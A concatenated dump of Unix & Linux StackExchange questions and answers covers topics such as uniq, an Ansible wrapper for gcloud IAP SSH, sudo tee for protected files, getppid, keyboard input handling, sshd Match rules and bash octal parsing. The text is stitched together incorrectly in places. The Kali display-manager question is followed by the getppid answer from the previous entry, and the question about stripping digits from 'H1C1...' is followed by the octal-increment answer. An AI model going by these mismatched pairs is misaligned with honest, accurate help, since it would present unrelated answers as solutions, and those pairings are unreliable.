{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/544861", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/341910/" ] }
544,887
What sed/awk command can I use? Just sort -u will remove all instances Input: abcabcdefabcabcdef Expected output: abcdefabcdef
That's what the uniq standard command is for. uniq your-file Note that some uniq implementations like GNU uniq will give you the first of a sequence of lines that sort the same (where strcoll() returns 0) as opposed to are byte-to-byte identical (where memcmp() or strcmp() returns 0). To force a byte to byte comparison regardless of the uniq implementation, you can force the locale to C with: LC_ALL=C uniq your-file
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/544887", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/365562/" ] }
545,034
Cloud IAP is a sort of proxy for Google Cloud Platform that lets you connect to compute instances that don't have public IP addresses, without a VPN. You stand up an instance and then you can use the gcloud utility to connect to it by name like so: gcloud compute ssh my-server-01 . This handles authenticating you through the proxy and logging you into the target server with your own Google account (using a feature called OS Login). I figure to make ansible do what the gcloud tool is doing I would need a custom connection plugin.
After discussion on https://www.reddit.com/r/ansible/comments/e9ve5q/ansible_slow_as_a_hell_with_gcp_iap_any_way_to/ I altered solution to use an SSH connection sharing via socket. It is two times faster then @mat solution. I put it on our PROD. Here is an implementation that doesn't depend on host name patterns! The proper solution is to use Bastion/Jump host because gcloud command still spawns Python interpreter that spawns ssh - it is still inefficient! ansible.cfg : [ssh_connection]pipelining = Truessh_executable = misc/gssh.shssh_args =transfer_method = piped[privilege_escalation]become = Truebecome_method = sudo[defaults]interpreter_python = /usr/bin/pythongathering = False# Somehow important to enable parallel execution...strategy = free gssh.sh : #!/bin/bash# ansible/ansible/lib/ansible/plugins/connection/ssh.py# exec_command(self, cmd, in_data=None, sudoable=True) calls _build_command(self, binary, *other_args) as:# args = (ssh_executable, self.host, cmd)# cmd = self._build_command(*args)# So "host" is next to the last, cmd is the last argument of ssh command.host="${@: -2: 1}"cmd="${@: -1: 1}"# ControlMaster=auto & ControlPath=... speedup Ansible execution 2 times.socket="/tmp/ansible-ssh-${host}-22-iap"gcloud_args="--tunnel-through-iap--zone=europe-west1-b--quiet--no-user-output-enabled---C-o ControlMaster=auto-o ControlPersist=20-o PreferredAuthentications=publickey-o KbdInteractiveAuthentication=no-o PasswordAuthentication=no-o ConnectTimeout=20"exec gcloud compute ssh "$host" $gcloud_args -o ControlPath="$socket" "$cmd" UPDATE There is response from Google engineer that gcloud aren't supposed to be called in parallel ! See "gcloud compute ssh" can't be used in parallel Experiments were shown that with Ansible fork=5 I almost always hit an error. With fork=2 I've never experienced one. UPDATE 2 Time passed and as of end of 2020 I can run gcloud compute ssh in parallel (in WSL I did fork = 10 ) without locking errors.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545034", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/314078/" ] }
545,039
I have a large file which looks like: India 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 1 NA NAIndia 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 NA NA NAIndia 07 1800 BALASORE 42895 +29.0 +26.8 NA 999.7 NA NA NAIndia 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 NA NA NAIndia 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 Trace NA NAIndia 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 NA NA NAIndia 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 Trace NA NAIndia 07 1800 BARMER 42435 +35.6 +22.6 NA 997.6 NA NA NAIndia 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 13 NA NAIndia 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 NA NA NAIndia 07 1800 BHUBANESHWAR 42971 +28.0 +25.7 NA 1000.7 NA NA NAIndia 07 1800 BHUJ-RUDRAMATA 42634 +29.6 +25.7 NA 999.5 NA NA NAIndia 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NAIndia 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NAIndia 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 10 NA NAIndia 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 NA NA NA In this file 2-3 lines are same with only one entry are different in the form of entry "NA" which can occur at any position. I want keep the line with less number of "NA". I am not able to think a solution for this. I want output as: India 07 1800 BAHRAICH 42273 +28.4 +26.7 NA 997.1 1 NA NAIndia 07 1800 BALASORE 42895 +29.0 +26.8 NA 999.7 NA NA NAIndia 07 1800 BANGALORE 43295 +23.0 +17.4 908.1 geopotential_of_850mb_=_492 Trace NA NAIndia 07 1800 BAREILLY 42189 +28.4 +26.2 NA 997.4 Trace NA NAIndia 07 1800 BARMER 42435 +35.6 +22.6 NA 997.6 NA NA NAIndia 07 1800 BHOPAL_BAIRAGHAR 42667 +23.6 +23.3 942.7 1000.5 13 NA NAIndia 07 1800 BHUBANESHWAR 42971 +28.0 +25.7 NA 1000.7 NA NA NAIndia 07 1800 BHUJ-RUDRAMATA 42634 +29.6 +25.7 NA 999.5 NA NA NAIndia 07 1800 BIKANER 42165 +33.8 +25.1 NA 994.0 NA NA NAIndia 07 1800 BOMBAY_SANTACRUZ 43003 +29.0 +26.8 NA 1004.4 10 NA NA I will appreciate even logic to do so. Thanks
Assuming the key is the 4th field and records with identical keys are consecutive (and I understood your question correctly), you could do something like: perl -lane ' $na = grep {$_ eq "NA"} @F; if ($F[3] eq $last_key) { if ($na < $min_na) { $min_na = $na; $min = $_ } } else { print $min unless $. == 1; $last_key = $F[3]; $min = $_; $min_na = $na; } END{print $min if $.}' < your-file Which among consecutive lines with same 4th field, prints the first one with the least number of NA fields. If they're not consecutive, you could use some sorting: < yourfile awk '{for (i=n=0;i<NF;i++) if ($i == "NA") n++; print n, $0}' | sort -k5,5 -k1,1n | sort -muk5,5 | cut -d ' ' -f 2- With busybox sort , you'd want to add the -s option to the second invocation as it seems to do some level of sorting of the input again despite the -m .
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545039", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/68133/" ] }
545,051
I am using a tool to calculate cylomatic complexity of a javascript file. Example: jsc --minimal test.js This command will give the following output. ┌─────────────────────┬─────┬────────────┬─────────────────────┐│ File │ LOC │ Cyclomatic │ Halstead difficulty │├─────────────────────┼─────┼────────────┼─────────────────────┤│ /home/shray/test.js │ 23 │ 4 │ 10 │└─────────────────────┴─────┴────────────┴─────────────────────┘Cyclomatic: min 4 mean 4.0 max 4Halstead: min 10 mean 10.0 max 10 Now I use jsc --minimal test.js | grep "Cyclomatic:" which gives me output as Cyclomatic: min 4 mean 4.0 max 4 Now I have a regex, Cyclomatic:[\s]*min[\s]+([0-9]+) but I am not able to use it to extract the number showing minimum Cylomatic value. Any help how can I just ouput the value of Min or Max Cyclomatic complexity value on the terminal output?
If you know that this line is always of the same format, you can use a simple cut : cut -d' ' -f3 or with awk you can do the whole thing including your first grep : awk '$1 == "Cyclomatic:" {print $3}' If the line might change, use sed : sed -E 's/.*( min )([0-9]+).*/\2/' or grep -P if available: grep -Po ' min \K[0-9]+' or normal grep : grep -o 'min [0-9]\+' This returns min 4 , which you can easily filter adding another grep or cut grep -o '[0-9]\+$'# orcut -d' ' -f2
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545051", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/316316/" ] }
545,097
I'm trying to come up with the sum of lines in .js files in a folder. I'm using this in bash: sum=0 && find . | grep ".js" | while read -r f; do wc -l $f | awk '{print $1;}'; done; putting the $sum += $1 inside the awk does not work. how am I supposed to do this? P.S: I'm aware this can be much easier achieve using find . -name '*.js' | xargs wc -l I still want the solution to above.
Try this easy and super fast solution: find . -type f -name "*.js" -exec cat {} + | wc -l I tried some solutions with wc before, but they will have issues with e.g. newline in file names and/or are slow.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545097", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/350921/" ] }
545,149
I am currently using sed to write to an apache configuration file from stdin . I am using sed in this script to get around the bash script limition where the calling user does not have privileges to write to the file, so I can't simply echo "..." >> outputfile.conf Here is what I have for writing to the file: echo "<VirtualHost *:80> ...</VirtualHost>" | sudo sed -n "w/etc/apache2/sites-available/000-default.conf" How can I later append to this same file? if $enable_ssl; then echo "<VirtualHost *:443> ... </VirtualHost>" | sudo sed <opions-to-sed-here>fi
The usual replacement for shell > with higher/different privileges is: echo "replace file content with this line" | sudo tee protectedFile >/dev/null And if you want to append, use -a : echo "append this line to file" | sudo tee -a protectedFile >/dev/null
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545149", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/-1/" ] }
545,244
In POSIX, processes are “related” to each other through two basic hierarchies: The hierarchy of parent and child processes. The hierarchy of sessions and process groups. User processes have a great deal of control over the latter, via setpgid and setsid , but they have very little control over the former—the parent process ID is set when a process is spawned and altered by the kernel when the parent exits (usually to PID 1), but otherwise it does not change. Reflecting on that, I’ve been wondering how important the parent–child relationship really is. Here’s a summary of my understanding so far: Parent–child relationships are clearly important from the perspective of the parent process, since various syscalls, like wait and setpgid , are only allowed on child processes. The session–group–process relationship is clearly important to all processes, both the session leader and other processes in the session, since syscalls like kill operate on entire process groups, setpgid can only be used to join a group in the same session, and all processes in a session’s foreground process group are sent SIGHUP if the session leader exits. What’s more, the two hierarchies are clearly related from the perspective of the parent, since setsid only affects new children and setpgid can only be used on children, but they seem essentially unrelated from the perspective of the child (since a parent process dying has no impact whatsoever on a process’s group or session). Conspicuously absent, however, is any reason for a child process to care what its current parent is. Therefore, I have the following question: does the current value of getppid() have any importance whatsoever from the perspective of the child process , besides perhaps identifying whether or not its spawning process has exited? To put the same question another way, imagine the same program is spawned twice, from the same parent, in two different ways: The first child is spawned in the usual way, by fork() followed shortly by exec() . The second child is spawned indirectly: the parent process calls fork() , and then the child also calls fork() , and it’s the grandchild process that calls exec() . The immediate child then exits, so the grandchild is orphaned, and its PPID is reassigned to PID 1. In this hypothetical scenario, assuming all else is equal, do any reasonable programs have any reason to behave any differently? So far, my conclusion seems to be “no,” since the session is left unchanged, as are the process’s inherited file descriptors… but I’m not sure. Note: I do not consider “acquiring the parent PID to communicate with it” to be a valid answer to that question, since orphaned programs cannot in general rely on their PPID to be set to 1 (some systems set orphaned processes’ PPID to some other value), so the only way to avoid a race condition is to acquire the parent process ID via a call to getpid() before forking, then to use that value in the child.
When I saw this question, I was pretty interested because I know I've seen getppid used before..but I couldn't remember where. So, I turned to one of the projects that I figured has probably used every Linux syscall and then some: systemd . One GitHub search later, and I found two uses that portray some more general use cases (there are a few other uses as well, but they're more specific to systemd): In sd-notify . For some context: systemd needs to know when a service has started so it can proceed to start any that depend on it. This is normally done from a C program via the sd_notify API , which is a way for daemons to tell systemd their status. Of course, if you're using a shell script as a service...calling C functions isn't exactly doable. Therefore, systemd comes with the systemd-notify command , which is a small wrapper over the sd_notify API. One problem: systemd also needs to know the PID that is sending the message. For systemd-notify, this would be its own PID, which would be a short-lived process ID that immediately goes away. Not useful. You probably already know where I'm headed: getppid is used by systemd-notify to grab the parent process's PID, since that's usually the actual service process. In short, getppid can be used by a short-lived CLI application to send a message on behalf of the parent process. Once I found this, another unix tool that might use getppid like this came to mind: polkit, which is a process authentication framework used to gate stuff like sending D-Bus messages or running privileged applications. (At minimum, I'd guess you've seen the GUI password prompts that are displayed by polkit's auth agents.) polkit includes an executable named pkexec that can be used a bit like sudo, except now polkit is used for authorization. Now, polkit needs to know the PID of the process asking for authorization...yeah you get the idea, pkexec uses getppid to find that . (While looking at that, I also found out that polkit's TTY auth agent uses it too .) This one's a bit less interesting but still notable: getppid is used to emulate PR_SET_PDEATHSIG if the parent had died by the time that flag was set. (The flag is just a way for a child to be automatically sent a signal like SIGKILL if the parent dies.)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545244", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/63459/" ] }
545,272
Ok, so this has started to happen today for no real reason. I wanted to boot up my Kali build when it got stuck on "[ OK ] Started GNOME Display Manager" Weird thing is, the mouse appears. Like if I was in the actual login screen.I can move the mouse, type, I've even tried to login. I feel like the OS did start, it's just that the screen doesn't change (oh and yes, recovery mode works. I might try to start another version or try to see the logs).
When I saw this question, I was pretty interested because I know I've seen getppid used before..but I couldn't remember where. So, I turned to one of the projects that I figured has probably used every Linux syscall and then some: systemd . One GitHub search later, and I found two uses that portray some more general use cases (there are a few other uses as well, but they're more specific to systemd): In sd-notify . For some context: systemd needs to know when a service has started so it can proceed to start any that depend on it. This is normally done from a C program via the sd_notify API , which is a way for daemons to tell systemd their status. Of course, if you're using a shell script as a service...calling C functions isn't exactly doable. Therefore, systemd comes with the systemd-notify command , which is a small wrapper over the sd_notify API. One problem: systemd also needs to know the PID that is sending the message. For systemd-notify, this would be its own PID, which would be a short-lived process ID that immediately goes away. Not useful. You probably already know where I'm headed: getppid is used by systemd-notify to grab the parent process's PID, since that's usually the actual service process. In short, getppid can be used by a short-lived CLI application to send a message on behalf of the parent process. Once I found this, another unix tool that might use getppid like this came to mind: polkit, which is a process authentication framework used to gate stuff like sending D-Bus messages or running privileged applications. (At minimum, I'd guess you've seen the GUI password prompts that are displayed by polkit's auth agents.) polkit includes an executable named pkexec that can be used a bit like sudo, except now polkit is used for authorization. Now, polkit needs to know the PID of the process asking for authorization...yeah you get the idea, pkexec uses getppid to find that . (While looking at that, I also found out that polkit's TTY auth agent uses it too .) This one's a bit less interesting but still notable: getppid is used to emulate PR_SET_PDEATHSIG if the parent had died by the time that flag was set. (The flag is just a way for a child to be automatically sent a signal like SIGKILL if the parent dies.)
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545272", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/375778/" ] }
545,274
I'm currently learning about the Linux Kernel and OSes in general, and while I have found many great resources concerning IRQs, Drivers, Scheduling and other important OS concepts, as well as keyboard-related resources, I am having a difficult time putting together a comprehensive overview of how the Linux Kernel handles a button press on a keyboard. I'm not trying to understand every single detail at this stage, but am rather trying to connect concepts, somewhat comprehensively. I have the following scenario in mind: I'm on a x64 machine with a single processor. There're a couple of processes running, notably the Editor VIM ( Process #1 ) and say LibreOffice ( Process #2 ). I'm inside VIM and press the a -key. However, the process that's currently running is Process #2 (with VIM being scheduled next). This is how I imagine things to go down right now: The keyboard, through a series of steps, generates an electrical signal (USB Protocol Encoding) that it sends down the USB wire. The signal gets processed by a USB-Controller, and is send through PCI-e (and possibly other controllers / buses?) to the Interrupt Controller ( APIC ). The APIC triggers the INT Pin of the processor. The processor switches to Kernel Mode and request an IRQ-Number from the APIC , which it uses as an offset into the Interrupt Descriptor Table Register ( IDTR ). A descriptor is obtained, that is then used to obtain the address of the interrupt handler routine. As I understand it, this interrupt handler was initially registered by the keyboard driver? The interrupt handler routine (in this case a keyboard handler routine) is invoked. This brings me to my main question: By which mechanism does the interrupt handler routine communicate the pressed key to the correct Process ( Process #1 )? Does it actually do that, or does it simply write the pressed key into a buffer (available through a char-device ?), that is read-only to one process at a time (and currently "attached" to Process #1 )? I don't understand at which time Process #1 receives the key. Does it process the data immediately, as the interrupt handler schedules the process immediately, or does it process the key data the next time that the scheduler schedules it? When this handler returns ( IRET ), the context is switched back to the previously executing process ( Process #2 ).
Your understanding so far is correct, but you miss most of the complexity that's built on that. The processing in the kernel happens in several layers, and the keypress "bubbles up" through the layers. The USB communication protocol itself is a lot more involved. The interrupt handler routine for USB handles this, and assembles a complete USB packet from multiple fragments, if necessary. The key press uses the so-called HID ("Human interface device") protocol, which is built on top of USB. So the lower USB kernel layer detects that the complete message is a USB HID event, and passes it to the HID layer in the kernel. The HID layer interprets this event according to the HID descriptor it has required from the device on initialization. It then passes the events to the input layer. A single HID event can generate multiple key press events. The input layer uses kernel keyboard layout tables to map the scan code (position of the key on the keyboard) to a key code (like A ) and interprets Shift , Alt , etc. The result of this interpretation is made available via /dev/input/event* to userland processes. You can use evtest to watch those events in real-time. But processing is not finished here. The X Server (responsible for graphics) has a generic evdev driver that reads events from /dev/input/event* devices, and then maps them again according to a second set of keyboard layout tables (you can see those partly with xmodmap and fully via the XKBD extension). This is because the X server predates the kernel input layer, and in earlier times had drivers to handle mouse and PS/2 keys directly. Then the X server sends a message to the X client (application) containing the keyboard event. You can see those messages with the xev application. LibreOffice will process this event directly, VIM will be running in an xterm which will process the event, and (you guessed it) again add some extra processing to it, and finally pass it to VIM via stdin . Complicated enough?
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545274", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/343395/" ] }
545,318
rsync -avi --delete --modify-window=1 --no-perms --no-o --no-g ~/Documents/Stuff/ /media/user/PC/Stuff;; i.e. to not copy sub-directories from the source directory?
You can add option --exclude='*/' to your rsync options to prevent syncing of directories.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545318", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/186571/" ] }
545,380
I'd like to pass the result of mktemp as argument to a command, let's say gcc -o . gcc -o $(mktemp) causes the result to be used, but I need to figure out the result. The only thing I could come up with is gcc -o $(out=$(mktemp); echo $out) , but that doesn't print the value to console, but instead it's used as argument value which is correct afaik. Is there any way to get the result of mktemp printed to console. I'm capable to solve this in a script. I'd like to broaden my knowledge with the one-liner solution you hopefully propose. I'd like to use this in bash on Ubuntu 19.04.
How about tee with /dev/tty ? $ gcc -o $(mktemp | tee /dev/tty) hello.c/tmp/tmp.UBSSnulNn2$ /tmp/tmp.UBSSnulNn2Hello, world! Related: using tee to output intermediate results to stdout instead of files
{ "score": 5, "source": [ "https://unix.stackexchange.com/questions/545380", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/63502/" ] }
545,462
I would assume ' inet ' stands for internet ip address, but is that correct? (And ' inet6 ' being internet ip address v.6.) ip a yields a list of virtual (and physical?) network devices. When an IP address is mapped to a device, it is displayed as 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000 link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 inet 127.0.0.1/8 scope host lo valid_lft forever preferred_lft forever inet6 ::1/128 scope host valid_lft forever preferred_lft forever According to https://acronyms.thefreedictionary.com/INET , the following definitions are possible:Acronym Definition INET Internet INET Intranet INET International Networking INET Information Network INET Institute for New Economic Thinking (est. 2009) INET International Networking (conference) INET Institutional Network (Hawaii Department of Education) INET Instruments and Experimental Techniques (journal) INET Interagency Narcotics Enforcement Team INET Instinet LLC INET Integrated Network Enhanced Telemetry INET Instructional Network
inet = Internet protocol family inet6 = Internet protocol version 6 family manpage inet DESCRIPTION The Internet protocol family is a collection of protocols layered atop the Internet Protocol (IP) transport layer, and utilizing the Internet address format. The Internet family provides protocol support for the SOCK_STREAM, SOCK_DGRAM, and SOCK_RAW socket types; the SOCK_RAW interface provides access to the IP protocol. manpage inet6 DESCRIPTION The inet6 family is an updated version of inet(4) family. While inet(4) implements Internet Protocol version 4, inet6 implements Internet Protocol version 6. inet6 is a collection of protocols layered atop the Internet Protocol version 6 (IPv6) transport layer, and utilizing the IPv6 address format. The inet6 family provides protocol support for the SOCK_STREAM, SOCK_DGRAM, and SOCK_RAW socket types; the SOCK_RAW interface provides access to the IPv6 protocol.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545462", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/33386/" ] }
545,502
Trying to write some nested loop, and I'm not getting how to write it. Perhaps I'm looking in a wrong direction but what I'm trying to write is: declare -a bar=("alpha" "bravo" "charlie")declare -a foo=("delta" "echo" "foxtrot" "golf")declare -a subgroups=("bar" "foo") So then I would like to iterate the subgroups (in the future more bar s and foo s will come), and inside them iterate them as they can have a different number of elements. The desired output would be something like: group name: bar with group members: alpha bravo charlie working on alpha of the bar group working on bravo of the bar group working on charlie of the bar groupgroup name: foo with group members: delta echo foxtrot golf working on delta of the foo group working on echo of the foo group working on foxtrot of the foo group working on golf of the foo group The closes code I've wrote seems fail in the bar and foo arrays and its expansion with the elements on each set. for group in "${subgroups[@]}"; do lst=${!group} echo "group name: ${group} with group members: ${!lst[@]}" for element in "${!lst[@]}"; do echo -en "\tworking on $element of the $group group\n" donedone And the output is: group name: bar with group members: 0 working on 0 of the bar groupgroup name: foo with group members: 0 working on 0 of the foo group
This is a pretty common problem in bash , to reference array within arrays for which you need to create name-references with declare -n . The name following the -n will act as a nameref to the value assigned (after = ). Now we treat this variable with nameref attribute to expand as if it were an array and do a full proper quoted array expansion as before. for group in "${subgroups[@]}"; do declare -n lst="$group" echo "group name: ${group} with group members: ${lst[@]}" for element in "${lst[@]}"; do echo -en "\tworking on $element of the $group group\n" donedone Note that bash supports nameref's from v4.3 onwards only. For older versions and other workarounds see Assigning indirect/reference variables
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545502", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/64405/" ] }
545,508
I'm currently trying to set up an SSH server so that access to it from outside the network is ONLY allowed using an SSH Key and does not allow access to root or by any other username/password combination. At the same time, internal users inside the network, still need to be able to connect to the same system, but expect to log in in the more traditional sense with a user name and password. Users both external & internal will be accessing the system from windows using PuttySSH and the external access will be coming into the system via a port forwarding firewall that will open the source port to the outside world on some arbitrarily chosen high numbered port like 55000 (or what ever the admins decide) The following diagram attempts to show the traffic flows better. I know how to set up the actual login to only use keys, and I know how to deny root, what I don't know is how to separate the two login types. I had considered running two copies of SSHD listening on different ports on the same IP and having two different configurations for each port. I also considered setting up a "match" rule, but I'm not sure if I can segregate server wide configurations using those options. Finally, the external person logging in will always be the same user let's call them "Frank" for the purposes of this question, so "Frank" will only ever be allowed to log in from the external IP, and never actually be sat in front of any system connecting internally, where as every other user of the system will only ever connect internally, and never connect from an external IP. Franks IP that he connects from is a dynamically assigned one but the public IP he is connecting too is static and will never change, the internal IP of the port forwarder like wise will also never change and neither will the internal IP address of the SSH server. Internal clients will always connect from an IP in the private network range that the internal SSH servers IP is part of and is a 16 bit mask EG: 192.168.0.0/16 Is this set up possible, using one config file and one SSH server instance? If so, how do I do it? or Am I much better using 2 running servers with different config? For ref the SSH server is running on Ubuntu 18.04.
So, it turns out the answer was actually way, way simpler than I thought it would be. I do however have to thank '@jeff schaller' for his comments, if it hadn't of been for him I wouldn't have started looking into how the SSH 'Match' configuration works. Anyway The trick is to set your /etc/ssh/sshd_config file up as default to be the configuration you would like to have for the access coming in from the external internet connection. In my case, this meant setting the following PermitRootLogin noPasswordAuthentication noUsePAM no By doing this, I'm forcing ALL logins no matter where they come from to need to be key based logins using an SSH key. I then on the windows machines used 'PuttyGen' to generate a public/private key pair which I saved to disk, and an appropriate ssh entry for my "authorized_hosts" file in the external users home directory. I pasted this ssh key into the correct place in my users home folder, then set putty up to use the private (ppk) file generated by PuttyGen for log in and saved the profile. I then saved the profile, and sent that and the ppk key file to the external user using a secure method (Encrypted email with a password protected zip file attached) Once the user had the ppk and profile in their copy of putty and could log in, I then added the following as the last 2 lines on my sshd_config file Match Host server1,server1.internalnet.local,1.2.3.4 PasswordAuthentication yes In the "Match" line I've changed the server names to protect the names of my own servers. Note each server domain is separated by a comma and NO SPACES, this is important. If you put any spaces in it causes SSHD to not load the config and report an error, the 3 matches I have in there do the following: server1 - matches on anyone using just 'server1' with no domain to connect EG: 'fred@server1' server1.internalnet.local - matches on anyone using the fully qualified internal domain name EG: '[email protected]' (NOTE: you will need an internal DNS to make this work correctly) 1.2.3.4 - matches on the specific I.P. address assigned to the SSH server EG: '[email protected]' this can use wild cards, or even better net/mask cidr format EG: 1.2.* or 192.168.1.0/8 if you do use wild cards however, please read fchurca's answer below for some important notes. If any of the patterns provided match the host being accessed, then the one and only single change to be made to the running config is to turn back on the ability to have an interactive password login. You can also put other config directives in here too, and those directives will also be turned back on for internal hosts listed in the match list. do however read this: https://man.openbsd.org/OpenBSD-current/man5/ssh_config.5 carefully, as not every configuration option is allowed to be used inside a match block, I found this out when I tried to "UsePAM yes" to turn PAM authentication back on, only to be told squarely that wasn't allowed. Once you've made your changes, type sshd -T followed by return to test them before attempting to restart the server, it'll report any errors you have. In addition to everything above, I got a lot of help from the following two links too: https://raymii.org/s/tutorials/Limit_access_to_openssh_features_with_the_Match_keyword.html https://www.cyberciti.biz/faq/match-address-sshd_config-allow-root-loginfrom-one_ip_address-on-linux-unix/
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545508", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/72591/" ] }
545,640
Nowadays within the programming community, console mostly refers to a text-based environment, either software (shells, terminals, cli) only or hardware included. But why is it so called?
There’s a similar question on Retrocomputing . The earliest computers were controlled using cables, switches and buttons on panels on the computer itself, and provided output using lights. Eventually the control devices were “extracted” from the computer into a separate device; for example the IBM 704’s operator console, which still used switches and lights but was a separate cabinet (see the IBM 704 operating manual , pages 13 and 14). Later on this became a separate piece of furniture based on a desk, with a keyboard and some form of output device (a printer or a screen). This is reminiscent of an organ console which can be separated from the instrument itself. On early multi-user computers, the console often had a special role: it was typically the only active terminal during early boot, and on some systems, logging in on the console granted more privileges than any other terminal. On most early systems the console was a text-only terminal, and that limitation has been associated with the term ever since. On PCs running Unix-like systems, the console generally used the built-in text-mode support, which probably helped preserve that association; but even on graphical workstations, emergency logins were typically text-only (albeit on a graphical framebuffer).
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545640", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/77068/" ] }
545,691
On Ubuntu 18.04, I have the following behavior of date : $ date --version | head -n1date (GNU coreutils) 8.28$ dateВт окт 8 13:18:18 MSK 2019$ TZ=UTC dateВт окт 8 10:18:23 UTC 2019 So far so good. But now I'm trying to do the same on Raspbian 9: $ date --version | head -n1date (GNU coreutils) 8.26$ dateTue Oct 8 13:18:50 MSK 2019$ TZ=UTC dateTue Oct 8 13:18:51 MSK 2019 What could be the reason for Raspbian version of date to ignore the TZ environment variable?
I can think of two possible causes: the file /usr/share/zoneinfo/UTC is not present or is corrupted on your Raspbian 9, so glibc fails to implement the TZ variable setting and falls back to system default timezone, you may have a previously-configured TZ variable that has been marked as read-only, so your attempt to change it won't take effect.
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545691", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/27672/" ] }
545,699
Has anyone used the gold linker before? To link a fairly large project, I had to use this as opposed to the GNU ld , which threw up a few errors and failed to link. How is the gold linker able to link large projects where ld fails? Is there some kind of memory trickery somewhere?
The gold linker was designed as an ELF-specific linker, with the intention of producing a more maintainable and faster linker than BFD ld (the “traditional” GNU binutils linker). As a side-effect, it is indeed able to link very large programs using less memory than BFD ld , presumably because there are fewer layers of abstraction to deal with, and because the linker’s data structures map more directly to the ELF format. I’m not sure there’s much documentation which specifically addresses the design differences between the two linkers, and their effect on memory use. There is a very interesting series of articles on linkers by Ian Lance Taylor, the author of the various GNU linkers, which explains many of the design decisions leading up to gold . He writes that The linker I am now working, called gold, on will be my third. It is exclusively an ELF linker. Once again, the goal is speed, in this case being faster than my second linker. That linker has been significantly slowed down over the years by adding support for ELF and for shared libraries. This support was patched in rather than being designed in. (The second linker is BFD ld .)
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545699", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/345639/" ] }
545,894
On my CentOS 7.7.1908, the manpage for boot (describing the system boot process) is not installed. How to find which package provides it? yum whatprovides /usr/share/man/man7/boot.7.gz returns no results. The bootup manpage is installed from the base repo and references the manpage boot(7) in the SEE ALSO section.
The boot(7) manpage is provided by the man-pages project. In CentOS, this is packaged as man-pages , but a few man pages which are considered irrelevant for CentOS are excluded, including boot(7) . boot(7) is considered irrelevant because it describes the System V-style boot process (using inittab and boot scripts). This does mean that CentOS (and RHEL, and Fedora) should patch out the reference to the man page...
{ "score": 4, "source": [ "https://unix.stackexchange.com/questions/545894", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/34039/" ] }
545,909
I have a file in the name of Build.number with the content value 012 which I need to increment by +1.So, I tried this BN=$($cat Build.number)BN=$(($BN+1))echo $BN >Build.number but here I am getting the value 11 when I am expecting 013 .Can anyone help me?
The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545909", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/376375/" ] }
545,914
I have the following input file H1C1C2C3H2C4... I would like to obtain the following output format only with the characters and not the numbers HCCCHC...
The leading 0 causes Bash to interpret the value as an octal value ; 012 octal is 10 decimal, so you get 11. To force the use of decimal, add 10# (as long as the number has no leading sign): BN=10#$(cat Build.number)echo $((++BN)) > Build.number To print the number using at least three digits, use printf : printf "%.3d\n" $((++BN)) > Build.number
{ "score": 6, "source": [ "https://unix.stackexchange.com/questions/545914", "https://unix.stackexchange.com", "https://unix.stackexchange.com/users/298739/" ] }
545,922
I'd like to have a very simple condition that will only execute if the command fails. In this example it's a conditional based on the SUCCESS of the command. if command ; then echo "Command succeeded"fi I'd like the opposite - how can I do this? Is there a elagant way besides doing a comparison on $? I do not want to use the || or operator - it does semantically convey (in my opinion) the desired functionality. In the case of command || echo "command failed" .
Negate the command’s exit status : if ! command ; then echo "Command failed"fi
